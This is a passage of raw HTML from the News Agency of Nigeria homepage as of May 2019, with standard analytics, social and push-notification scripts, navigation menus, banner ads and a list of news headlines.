rel='shortlink' href='https://wp.me/P7MVvz-60' /> <link rel="alternate" type="application/json+oembed" href="https://www.nan.ng/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.nan.ng%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.nan.ng/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.nan.ng%2F&#038;format=xml" /> <!-- This site is using AdRotate v5.0.1 to display their advertisements - https://ajdg.solutions/products/adrotate-for-wordpress/ --> <!-- AdRotate CSS --> <style type="text/css" media="screen"> .g { margin:0px; padding:0px; overflow:hidden; line-height:1; zoom:1; } .g img { height:auto; } .g-col { position:relative; float:left; } .g-col:first-child { margin-left: 0; } .g-col:last-child { margin-right: 0; } .g-1 { margin:0px;width:100%; max-width:728px; height:100%; max-height:120px; } .g-2 { margin:0px;width:100%; max-width:300px; height:100%; max-height:630px; } @media only screen and (max-width: 480px) { .g-col, .g-dyn, .g-single { width:100%; margin-left:0; margin-right:0; } } </style> <!-- /AdRotate CSS --> <link rel='dns-prefetch' href='//v0.wordpress.com'/> <style type='text/css'>img#wpstats{display:none}</style> <meta name="generator" content="Good News Child v2.0.8 by XplodedThemes.com"><style type="text/css" id="voting-style-css"> .xt-votes .xt-likes { background-color: #1193f6!important} .xt-votes .xt-likes{ color: #ffffff!important} .xt-votes .xt-likes a{ color: #ffffff!important} .xt-votes .xt-dislikes { background-color: #ebebeb!important} .xt-votes .xt-dislikes{ color: #7d7d7d!important} .xt-votes .xt-dislikes a{ color: #7d7d7d!important} .xt-votes { text-align: left} .xt-likes, .xt-dislikes, .xt-votes i { font-size: 14px!important} </style> <script type="text/javascript"> XT_LIKES = {"base_url":"https:\/\/www.nan.ng","ajax_url":"https:\/\/www.nan.ng\/wp-admin\/admin-ajax.php"}; </script> <meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/> <!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="https://s18694.pcdn.co/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--> <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async></script> <script> window.OneSignal = window.OneSignal || []; OneSignal.push( function() { OneSignal.SERVICE_WORKER_UPDATER_PATH = "OneSignalSDKUpdaterWorker.js.php"; OneSignal.SERVICE_WORKER_PATH = "OneSignalSDKWorker.js.php"; OneSignal.SERVICE_WORKER_PARAM = { scope: '/' }; OneSignal.setDefaultNotificationUrl("https://www.nan.ng"); var oneSignal_options = {}; window._oneSignalInitOptions = oneSignal_options; oneSignal_options['wordpress'] = true; oneSignal_options['appId'] = '4c64c351-8e0a-479c-9784-8158d0a425b2'; oneSignal_options['autoRegister'] = false; oneSignal_options['welcomeNotification'] = { }; oneSignal_options['welcomeNotification']['title'] = ""; oneSignal_options['welcomeNotification']['message'] = ""; oneSignal_options['subdomainName'] = "nanng"; oneSignal_options['promptOptions'] = { }; oneSignal_options['notifyButton'] = { }; oneSignal_options['notifyButton']['enable'] = true; oneSignal_options['notifyButton']['position'] = 'bottom-right'; oneSignal_options['notifyButton']['theme'] = 'default'; oneSignal_options['notifyButton']['size'] = 'medium'; oneSignal_options['notifyButton']['prenotify'] = true; oneSignal_options['notifyButton']['showCredit'] = true; oneSignal_options['notifyButton']['text'] = {}; oneSignal_options['notifyButton']['text']['message.prenotify'] = 'Click to subscribe to NAN notifications'; oneSignal_options['notifyButton']['text']['tip.state.subscribed'] = 'You&#039;re subscribed to NAN notofications'; oneSignal_options['notifyButton']['offset'] = {}; oneSignal_options['notifyButton']['offset']['bottom'] = '50px'; OneSignal.init(window._oneSignalInitOptions); }); function documentInitOneSignal() { var oneSignal_elements = document.getElementsByClassName("OneSignal-prompt"); var oneSignalLinkClickHandler = function(event) { OneSignal.push(['registerForPushNotifications']); event.preventDefault(); }; for(var i = 0; i < oneSignal_elements.length; i++) oneSignal_elements[i].addEventListener('click', oneSignalLinkClickHandler, false); } if (document.readyState === 'complete') { documentInitOneSignal(); } else { window.addEventListener("load", function(event){ documentInitOneSignal(); }); } </script> <link rel="icon" href="https://s18694.pcdn.co/wp-content/uploads/2016/10/cropped-NANicon512-32x32.png" sizes="32x32" /> <link rel="icon" href="https://s18694.pcdn.co/wp-content/uploads/2016/10/cropped-NANicon512-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://s18694.pcdn.co/wp-content/uploads/2016/10/cropped-NANicon512-180x180.png" /> <meta name="msapplication-TileImage" content="https://s18694.pcdn.co/wp-content/uploads/2016/10/cropped-NANicon512-270x270.png" /> <style type="text/css" data-type="vc_custom-css">.gallery-slider-section{ -webkit-transition: all 0.5s ease-out; -moz-transition: all 0.5s ease-out; -o-transition: all 0.5s ease-out; transition: all 0.5s ease-out; } .gallery-slider-section > div{ -webkit-transition: -webkit-transform 0.5s ease-out; -moz-transition: -moz-transform 0.5s ease-out; -o-transition: -o-transform 0.5s ease-out; transition: transform 0.5s ease-out; } @media only screen and (min-width: 1700px) { .gallery-slider-section { padding: 120px 0; background-color: #000E1D; } .gallery-slider-section > div{ -moz-transform: skewX(-2deg); -ms-transform: skewX(-2deg); -o-transform: skewX(-2deg); -webkit-transform: skewX(-2deg); transform: skewX(-2deg); } } .tv-white a { color: #FFFFFF; }</style><style type="text/css" data-type="vc_shortcodes-custom-css">.vc_custom_1474744588308{margin-top: 11px !important;margin-bottom: 0px !important;padding-right: 0px !important;}.vc_custom_1532352528767{margin-top: 20px !important;margin-bottom: 20px !important;padding-right: 0px !important;}.vc_custom_1475176837698{margin-top: 20px !important;}.vc_custom_1472317630989{background-color: #141414 !important;}.vc_custom_1486826025817{margin-top: -325px !important;border-bottom-width: 10px !important;}.vc_custom_1486826456743{margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;}.vc_custom_1475673630946{margin-top: 0px !important;margin-right: 5px !important;margin-left: 5px !important;padding-top: 0px !important;padding-right: 5px !important;padding-left: 5px !important;}.vc_custom_1474744701222{margin-left: -10px !important;padding-right: 0px !important;}.vc_custom_1475411176798{padding-left: 0px !important;}.vc_custom_1475412270676{margin-bottom: 0px !important;border-right-width: 1px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-right-color: #ededed !important;}.vc_custom_1473506340713{margin-left: -10px !important;}.vc_custom_1473528313917{margin-left: 0px !important;padding-left: 0px !important;}.vc_custom_1472994045041{padding-left: 0px !important;}.vc_custom_1473519238393{margin-bottom: 0px !important;padding-bottom: 0px !important;}.vc_custom_1473515266252{margin-bottom: 0px !important;padding-bottom: 0px !important;}.vc_custom_1473528412398{margin-left: 0px !important;padding-left: 0px !important;}.vc_custom_1472318420160{margin-bottom: 20px !important;}.vc_custom_1472318420160{margin-bottom: 20px !important;}.vc_custom_1473514729957{margin-top: 15px !important;padding-top: 15px !important;}.vc_custom_1473514729957{margin-top: 15px !important;padding-top: 15px !important;}.vc_custom_1470418134805{margin-right: 0px !important;padding-right: 0px !important;}.vc_custom_1470418156368{margin-left: -10px !important;}.vc_custom_1469713274519{border-right-width: 1px !important;border-right-color: #ededed !important;}.vc_custom_1475673458746{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;}</style><noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> </head> <body class="home page-template-default page page-id-372 layout-full has-wpb-js-composer wpb-js-composer js-comp-ver-5.1.1 vc_responsive"> <script> window.fbAsyncInit = function() { FB.init({ appId : '661603627323791', xfbml : true, version : 'v2.7' }); }; (function(d, s, id){ var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) {return;} js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_US/sdk.js"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk')); </script> <script type="text/javascript"> window.fbAsyncInit = function() { FB.init({ appId : 494784607323930, // App ID cookie : true, // enable cookies to allow the server to access the session xfbml : true, // parse XFBML version : 'v2.4' // use version 2.0 }); }; // Load the SDK asynchronously (function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_US/sdk.js"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk')); </script> <div class="lights_overlay visually-hidden hidden"></div> <div id="pusher" class="off-canvas-wrap closed" data-offcanvas> <div id="wrapper" class="container inner-wrap"> <!-- Off canvas sticky menu --> <aside class="off-canvas-menu right-off-canvas-menu"> <div class="off-canvas-list"><ul class="off-canvas-list"> <li class="page_item page-item-50069"><a href="https://www.nan.ng/about-us/">About Us</a></li> <li class="page_item page-item-103431"><a href="https://www.nan.ng/advertise-with-us/">Advertise With Us</a></li> <li class="page_item page-item-117109"><a href="https://www.nan.ng/story-locations/">Story Locations</a></li> <li class="page_item page-item-101209"><a href="https://www.nan.ng/we-host-your-events-and-put-your-mind-at-rest/">We Host Your Events And Put Your Mind at Rest.</a></li> <li class="page_item page-item-4017"><a href="https://www.nan.ng/home-2/">NAN</a></li> <li class="page_item page-item-372 current_page_item"><a href="https://www.nan.ng/" aria-current="page">News Agency of Nigeria (NAN)</a></li> <li class="page_item page-item-3960"><a href="https://www.nan.ng/terms-conditions/">Terms &#038; Conditions</a></li> <li class="page_item page-item-3362"><a href="https://www.nan.ng/contact-us/">Contact Us</a></li> <li class="page_item page-item-2163"><a href="https://www.nan.ng/features/blog/news-list-large/">News &#8211; List Large</a></li> <li class="page_item page-item-2147"><a href="https://www.nan.ng/features/videos/">Videos</a></li> </ul></div> </aside> <!-- End Off canvas sticky menu --> <div id="outer_wrapper" class="outer_wrapper"> <!-- Header --> <header id="main-header"> <!-- Above Top Bar Widget Zone --> <!-- Top Menu Bar --> <div class="top-menu sticky-scroll-up contain-to-grid show-for-small-only"> <nav class="top-bar" data-topbar data-sticky_height="0" data-distance="245" data-options="sticky_on: small; back_text: Back"> <ul class="sticky-menu right onsticky"> <li class="toggle-sidebar menu-icon"><a href="#" class="right-off-canvas-toggle off-canvas-toggle"><i class="icon-ion-bars"></i></a></li> </ul> <ul class="sticky-menu right onsticky"> <li class="toggle-search menu-search"><a href="#" class="search-toggle" data-dropdown="search-drop" aria-controls="search-drop" aria-expanded="false"><i class="icon-ion-search"></i></a></li> <li id="search-drop" class="search-drop has-form f-dropdown" data-dropdown-content aria-hidden="true"> <form method="get" action="https://www.nan.ng/"> <div class="row collapse"> <div class="small-12 columns small-centered transition"> <input type="text" name="s" class="search-input" autocomplete="off" value="" placeholder="Start searching..."> <a href="#" class="transparent button search-button"><i class="icon-ion-search"></i></a> <a href="#" class="transparent search-close-button"><i class="icon-ion-close-outline"></i></a> </div> </div> </form> </li> </ul> <ul class="title-area"> <li class="name show-for-small-only"> <h1 class="show-for-medium-up"><a href="https://www.nan.ng/">News Agency of Nigeria (NAN)</a></h1> <a href="https://www.nan.ng/" class="site-logo show-for-small-only"> <img class="to-be-loaded" data-interchange="[https://www.nan.ng/wp-content/uploads/2016/08/NAN-static-logo.png, (default)]" alt="News Agency of Nigeria (NAN)"> <noscript><img src="https://s18694.pcdn.co/wp-content/uploads/2016/08/NAN-static-logo.png" alt="News Agency of Nigeria (NAN)"></noscript> </a> </li> <li class="toggle-topbar menu-icon"><a href="#"></a></li> </ul> <section class="top-bar-section"> <!-- Right Nav Section --> <h2 class="hide-for-small-up">--</h2> <div align="right" style="height: 35px; margin: 10px 0 0 5px"> <ul style="float: right"> <li style="margin-right: 20px; "> May 16, 2019</li> <li style="margin-right: 10px"> <iframe src="//www.facebook.com/plugins/like.php?href=https://www.facebook.com/NewsAgencyNigeria&amp;send=false&amp;layout=button_count&amp;width=160&amp;show_faces=true&amp;action=like&amp;colorscheme=light&amp;font&amp;height=21&amp;appId=661603627323791" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:90px; height:21px;" allowTransparency="true"></iframe> </li> <li><a href="https://twitter.com/nanonlineng" class="twitter-follow-button" data-show-count="true">Follow @nanonlineng</a><script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+'://platform.twitter.com/widgets.js';fjs.parentNode.insertBefore(js,fjs);}}(document,'script','twitter-wjs');</script> </li> </ul> </div> <ul id="main-mobile-menu" class="left menu show-for-small-only clearfix"><li id="menu-item-50024" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home" data-itemid="50024" data-objectid="50024"><a href="https://www.nan.ng">News Agency of Nigeria</a></li> <li id="menu-item-118519" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-category-slug-2019-elections menu-category-id-33365" data-itemid="118519" data-objectid="33365"><a href="https://www.nan.ng/2019-elections/">2019 Elections</a></li> <li id="menu-item-49588" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-category-slug-news menu-category-id-67" data-itemid="49588" data-objectid="67"><a href="https://www.nan.ng/news/">News</a></li> <li id="menu-item-49590" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-category-slug-politics menu-category-id-73" data-itemid="49590" data-objectid="73"><a href="https://www.nan.ng/politics/">Politics</a></li> <li id="menu-item-49591" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-category-slug-sports menu-category-id-78" data-itemid="49591" data-objectid="78"><a href="https://www.nan.ng/sports/">Sports</a></li> <li id="menu-item-49593" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-category-slug-entertainment menu-category-id-2" data-itemid="49593" data-objectid="2"><a href="https://www.nan.ng/entertainment/">Entertainment</a></li> <li id="menu-item-49594" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-category-slug-health menu-category-id-52" data-itemid="49594" data-objectid="52"><a href="https://www.nan.ng/health/">Health</a></li> <li id="menu-item-49595" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-category-slug-lifestyle menu-category-id-57" data-itemid="49595" data-objectid="57"><a href="https://www.nan.ng/lifestyle/">LifeStyle</a></li> <li id="menu-item-103442" class="menu-item menu-item-type-post_type menu-item-object-page" data-itemid="103442" data-objectid="103431"><a href="https://www.nan.ng/advertise-with-us/">Advertise With Us</a></li> </ul><!-- Mobile Search Section --> <ul class="search show-for-small-only clearfix"> <li class="has-form"> <form method="get" action="https://www.nan.ng/"> <div class="row collapse"> <div class="small-12 columns small-centered transition"> <input type="text" name="s" class="search-input" autocomplete="off" value="" placeholder="Start searching..."> <a href="#" class="transparent button search-button"><i class="icon-ion-search"></i></a> <a href="#" class="transparent search-close-button"><i class="icon-ion-close-outline"></i></a> </div> </div> </form> </li> </ul> <!-- Mobile social Networks Section --> <div class="show-for-small-only clearfix"> <!-- social-networks --> <ul class="social-networks"> <li> <a style="color:#3c5a9b" target="_blank" href="https://www.facebook.com/News-Agency-of-Nigeria-160776271020000"> <i class="fa fa-facebook" title="Facebook"></i> </a> </li> <li> <a style="color:#1fc1f1" target="_blank" href="https://twitter.com/nanonlineng"> <i class="fa fa-twitter" title="Twitter"></i> </a> </li> <li> <a style="color:#cc181e" target="_blank" href="https://www.youtube.com/channel/UC4_wKYII2PKPomxql2jfKgg"> <i class="fa fa-youtube" title="YouTube"></i> </a> </li> <li> <a style="color:#007bb9" target="_blank" href="http://linkedin.com"> <i class="fa fa-linkedin" title="Linkedin"></i> </a> </li> <li> <a style="color:" target="_blank" href="https://plus.google.com/b/104642377828679477053/"> <i class="fa fa-google-plus" title="Google Plus"></i> </a> </li> </ul> </div> </section> </nav> </div> <!-- End Top Menu Bar --> <!-- Below Top Bar Widget Zone --> <!-- Above Main Menu Widget Zone --> <!-- Main Menu Bar --> <div class="main-menu hide-for-small-only contain-to-grid "> <nav class="top-bar" data-topbar data-sticky_height="0" data-distance="200" data-options="sticky_on: medium"> <section class="top-bar-section search-toggle-always"> <!-- Right Nav Section --> <ul class="right search top-level"> <li class="has-form"> <form method="get" action="https://www.nan.ng/"> <div class="row collapse"> <div class="small-12 columns small-centered transition"> <input type="text" name="s" class="search-input" autocomplete="off" value="" placeholder="Start searching..."> <a href="#" class="transparent button search-button"><i class="icon-ion-search"></i></a> <a href="#" class="transparent search-close-button"><i class="icon-ion-close-outline"></i></a> </div> </div> </form> </li> </ul> <!-- Left Nav Section --> <ul id="main-menu" class="menu top-level left"><li class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home" data-itemid="50024" data-objectid="50024"><a href="https://www.nan.ng">News Agency of Nigeria</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-category-slug-2019-elections menu-category-id-33365 menu-category-slug-2019-elections menu-category-id-33365" data-itemid="118519" data-objectid="33365"><a href="https://www.nan.ng/2019-elections/">2019 Elections</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-category-slug-news menu-category-id-67 menu-category-slug-news menu-category-id-67" data-itemid="49588" data-objectid="67"><a href="https://www.nan.ng/news/">News</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-category-slug-politics menu-category-id-73 menu-category-slug-politics menu-category-id-73" data-itemid="49590" data-objectid="73"><a href="https://www.nan.ng/politics/">Politics</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-category-slug-sports menu-category-id-78 menu-category-slug-sports menu-category-id-78" data-itemid="49591" data-objectid="78"><a href="https://www.nan.ng/sports/">Sports</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-category-slug-entertainment menu-category-id-2 menu-category-slug-entertainment menu-category-id-2" data-itemid="49593" data-objectid="2"><a href="https://www.nan.ng/entertainment/">Entertainment</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-category-slug-health menu-category-id-52 menu-category-slug-health menu-category-id-52" data-itemid="49594" data-objectid="52"><a href="https://www.nan.ng/health/">Health</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-category-slug-lifestyle menu-category-id-57 menu-category-slug-lifestyle menu-category-id-57" data-itemid="49595" data-objectid="57"><a href="https://www.nan.ng/lifestyle/">LifeStyle</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page" data-itemid="103442" data-objectid="103431"><a href="https://www.nan.ng/advertise-with-us/">Advertise With Us</a></li> </ul> </section> </nav> </div> <!-- Below Main Menu Widget Zone --> <!-- End Main Menu Bar --> <div class="logo-bar hide-for-small-only contain-to-grid logo-left"> <div class="logo-bar-inner"> <div class="row valign-middle collapse"> <div class="small-4 column"> <div class="left r-padding "><a href="https://www.nan.ng/"><img src="https://s18694.pcdn.co/wp-content/uploads/2016/08/NAN-static-logo.png" width="120px"/></a></div> </div> <div class="small-8 column"> <div class="right ad-zone"><div class="g g-1"><div class="g-dyn a-5 c-1"><div style="margin: 25px 0 10px"> <a class="gofollow" data-track="NSwxLDEsNjA=" href="https://www.zenithbank.com/966"><img src="https://s18694.pcdn.co/wp-content/uploads/2016/12/Zenith-Bank-966-TRF-728x90.gif" /></a> </div></div><div class="g-dyn a-6 c-2"><div style="margin: 25px 0 10px"> <a class="gofollow" data-track="NiwxLDEsNjA=" href="https://goo.gl/U8TjL2"><img src="https://s18694.pcdn.co/wp-content/uploads/2017/05/dangote_728x90.jpg" /></a> </div></div><div class="g-dyn a-3 c-3"><div style="margin: 25px 0 10px"> <a class="gofollow" data-track="MywxLDEsNjA=" href="http://www.paywithcapture.com"><img src="https://s18694.pcdn.co/wp-content/uploads/2016/10/paywithcapture728X90.jpg" /></a> </div> </div></div></div> </div> </div> </div> </div> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-81664056-1', 'auto'); ga('send', 'pageview'); </script> </header> <!-- End Header --> <!-- Main Page Content and Sidebar --> <div id="inner_wrapper" class="inner_wrapper hide-on-mobile-menu "> <div class="body_overlay"></div> <div class="row full-width"> <div class="medium-12 column left"> <div class="vc_row wpb_row vc_custom_1474744588308 in-container"> <div class="vc_col-sm-8 vc_hidden-sm vc_hidden-xs wpb_column vc_column_container"> <div class="wpb_wrapper"> <div class="vc_row wpb_row vc_inner latest-headline vc_custom_1475411176798 in-container"> <div class="vc_col-sm-12 latest-list wpb_column vc_column_container vc_custom_1475412270676"> <div class="wpb_wrapper"> <div class="vc_widget xt_news widget wpb_content_element check_cache" data-cache_enabled="0" data-flush_cache="0"> <style id="xtwidget6f280cb85080787ff486dd83c3cbd229_style" class="widget-instance-style" scoped> #xtwidget6f280cb85080787ff486dd83c3cbd229 .xt-post-title:not(.bold),#xtwidget6f280cb85080787ff486dd83c3cbd229 .xt-post-title:not(.bold) > a{font-weight:400;} </style><div id="xtwidget6f280cb85080787ff486dd83c3cbd229" class="widget xt_news "><div class="xt-widget-wrap"><div class="xt-widget-content clearfix"> <ul class="news-list posts-grid xt-ajax-wrap small-block-grid-1 small-grid-offset meta-category-stats-over meta-options medium-block-grid-1 large-block-grid-1" > <li class="post-124172 post type-post status-publish format-standard has-post-thumbnail hentry category-headlines category-news tag-alhaji-atiku-abubakar tag-pdp" itemscope="" itemtype="http://schema.org/BlogPosting" data-equalizer-watch> <div class="row collapse has-background custom-height " onclick="location.href='https://www.nan.ng/news/pdp-atiku-sabotaging-buharis-government/'" style="height:350px; background-image: url(https://s18694.pcdn.co/wp-content/uploads/2019/02/Atiku-in-Rivers.jpg)"> <div class="medium-12 in_widget column"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/news/pdp-atiku-sabotaging-buharis-government/"> <img itemprop="image" alt="Atiku-in-Rivers.jpg" src="https://s18694.pcdn.co/wp-content/uploads/2019/02/Atiku-in-Rivers.jpg" width="0" height="0" class="wp-post-image wp-featured-image"> </a> <div class="icon-overlay"><span class="fa fa fa-no-icon"></span></div> </div> <div class="medium-12 in_widget column meta-container"> <div class="meta row in-container"> </div> </div> </div> <div class="row collapse " itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h3 class="bold xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="PDP, Atiku sabotaging Buhari&#8217;s government" target="_self" href="https://www.nan.ng/news/pdp-atiku-sabotaging-buharis-government/">PDP, Atiku sabotaging Buhari&#8217;s government</a> </h3> <meta itemprop="datePublished" content="2019-05-15T22:29:57+01:00"> <meta itemprop="dateModified" content="2019-05-15T22:29:57+01:00"> </div> </div> </div> </li> </ul> </div></div></div></div> </div> </div> </div> </div> </div> <div class="vc_col-sm-4 vc_hidden-sm vc_hidden-xs wpb_column vc_column_container vc_custom_1474744701222"> <div class="wpb_wrapper"> <div class="vc_widget xt_news widget wpb_content_element check_cache" data-cache_enabled="0" data-flush_cache="0"> <style id="xtwidgetbf95045db74c2ceaf03411c6149873a0_style" class="widget-instance-style" scoped> #xtwidgetbf95045db74c2ceaf03411c6149873a0 .xt-post-title,#xtwidgetbf95045db74c2ceaf03411c6149873a0 .xt-post-title > a{font-size:15px;line-height:19px;}#xtwidgetbf95045db74c2ceaf03411c6149873a0 .xt-post-title:not(.bold),#xtwidgetbf95045db74c2ceaf03411c6149873a0 .xt-post-title:not(.bold) > a{font-weight:600;}#xtwidgetbf95045db74c2ceaf03411c6149873a0 .xt-post-excerpt{font-size:14px;line-height:18px;font-weight:400;}@media only screen and (max-width:849px){#xtwidgetbf95045db74c2ceaf03411c6149873a0 .xt-post-title,#xtwidgetbf95045db74c2ceaf03411c6149873a0 .xt-post-title > a{font-size:15px!important;}}@media only screen and (max-width:849px){#xtwidgetbf95045db74c2ceaf03411c6149873a0 .xt-post-excerpt{font-size:14px!important;}} </style><div id="xtwidgetbf95045db74c2ceaf03411c6149873a0" class="widget xt_news "><div class="xt-widget-wrap"><div class="xt-widget-header clearfix has-pagination"><div class="xt-spinner-wrap prev-next"> <div class="xt-spinner prev-next sk-circle"> <div class="sk-circle1 sk-child"></div> <div class="sk-circle2 sk-child"></div> <div class="sk-circle3 sk-child"></div> <div class="sk-circle4 sk-child"></div> <div class="sk-circle5 sk-child"></div> <div class="sk-circle6 sk-child"></div> <div class="sk-circle7 sk-child"></div> <div class="sk-circle8 sk-child"></div> <div class="sk-circle9 sk-child"></div> <div class="sk-circle10 sk-child"></div> <div class="sk-circle11 sk-child"></div> <div class="sk-circle12 sk-child"></div> </div></div><nav class="xt-news-pagination navigation paging-navigation type-prev-next top-right right" data-type="prev-next" data-position="top-right" data-animation="_fade" data-animationdir="left-right" data-instance="xtwidgetbf95045db74c2ceaf03411c6149873a0"><div class="pagination loop-pagination"><a data-page="1" data-direction="previous" href="#" class="page-disabled page-numbers previous-page"><span class="fa fa-angle-left"></span> Prev</a><a data-page="2" data-direction="next" href="#" class="page-numbers next-page">Next <span class="fa fa-angle-right"></span></a></div></nav> <script id="script_xtwidgetbf95045db74c2ceaf03411c6149873a0" class="widget-instance-script"> var xtwidgetbf95045db74c2ceaf03411c6149873a0 = {title: "Latest News",action_title: "",action_obj_id: "",action_ext_link: "",css_animation: "",query_type: "most-recent",date_range: "",custom_query: "",selection: "",include_posts: "",related_to: "",related_to_type: "categories",category: "",exclude_category: "",query_post_formats: "",number: "7",offset: "",pagination: "prev-next",pagination_position: "top-right",pagination_arrows_only: "",pagination_show_current: "yes",pagination_animation: "_fade",pagination_animation_direction: "left-right",pagination_max_pages: "10",pagination_infinite_max_pages: "",page: "",format: "",view: "text-list|size:small",grid_gutter: "",meta_options: "",meta_over_padding: "",show_title_on_hover: "",show_excerpt_on_hover: "",show_category_on_hover: "",image_height_type: "",image_height: "",columns_width: "",columns_posts_count: "",slider_height: "",thumbnails_size: "",featured_thumbnails_size: "",custom_thumbnails_size_w: "",custom_thumbnails_size_h: "",custom_featured_thumbnails_size_w: "",custom_featured_thumbnails_size_h: "",thumbnails_filter: "",embed_video: "",show_excerpt: "",show_excerpt_only_featured: "",show_date: "",show_date_only_featured: "",datetime_ago: "",show_author: "",show_author_only_featured: "",show_stats: "",show_stats_only_featured: "",show_category: "",show_category_only_featured: "",max_categories: "",title_length: "",title_font_size: "15",title_font_weight: "600",title_line_height: "19",title_margin_bottom: "",excerpt_length: "30",excerpt_font_size: "14",excerpt_font_weight: "400",excerpt_line_height: "18",excerpt_margin_bottom: "",featured_title_length: "",featured_title_font_size: "",featured_title_font_weight: "",featured_title_line_height: "",featured_title_margin_bottom: "",featured_excerpt_length: "55",featured_excerpt_font_size: "",featured_excerpt_font_weight: "",featured_excerpt_line_height: "",featured_excerpt_margin_bottom: ""}; </script><h3 class="widgettitle">Latest News </h3></div><div class="xt-widget-content xt-widget-has-header clearfix"> <ul class="news-list xt-ajax-wrap posts-list-small list" > <li class="post-124197 post type-post status-publish format-standard has-post-thumbnail hentry category-entertainment category-news tag-folklore tag-nigerian-folklore-society-nfs" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="small-12 large-12 column left last"> <div class="meta default-meta side"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Cultural preservation: Society tasks media on folklore" target="_self" href="https://www.nan.ng/entertainment/cultural-preservation-society-tasks-media-on-folklore/">Cultural preservation: Society tasks media on folklore</a> </h5> <meta itemprop="datePublished" content="2019-05-16T15:48:18+01:00"> <meta itemprop="dateModified" content="2019-05-16T15:48:18+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2019/05/Dr-Bukar-Usman-President-Nigerian-Folklore-Society-270x180.jpg"> </div> </div> </div> </li> <li class="post-124195 post type-post status-publish format-standard has-post-thumbnail hentry category-news tag-china tag-huawei tag-u-s" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="small-12 large-12 column left last"> <div class="meta default-meta side"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Huawei: China threatens to retaliate over US sanctions" target="_self" href="https://www.nan.ng/news/huawei-china-threatens-to-retaliate-over-us-sanctions/">Huawei: China threatens to retaliate over US sanctions</a> </h5> <meta itemprop="datePublished" content="2019-05-16T15:43:43+01:00"> <meta itemprop="dateModified" content="2019-05-16T15:43:43+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2019/05/Huawei-270x180.jpg"> </div> </div> </div> </li> <li class="post-124196 post type-post status-publish format-standard has-post-thumbnail hentry category-news tag-gov-akinwunmi-ambode tag-lagos-state" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="small-12 large-12 column left last"> <div class="meta default-meta side"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Lagos housing schemes ready for applicants soon &#8211; Gov. Ambode" target="_self" href="https://www.nan.ng/news/lagos-housing-schemes-ready-for-applicants-soon-gov-ambode/">Lagos housing schemes ready for applicants soon &#8211; Gov. Ambode</a> </h5> <meta itemprop="datePublished" content="2019-05-16T15:23:57+01:00"> <meta itemprop="dateModified" content="2019-05-16T15:23:57+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2017/07/Mass-Housing-Plan-showcased-at-the-Abuja-show-270x180.jpg"> </div> </div> </div> </li> <li class="post-124194 post type-post status-publish format-standard has-post-thumbnail hentry category-agriculture category-news tag-abia tag-farmers tag-herdsmen" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="small-12 large-12 column left last"> <div class="meta default-meta side"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" 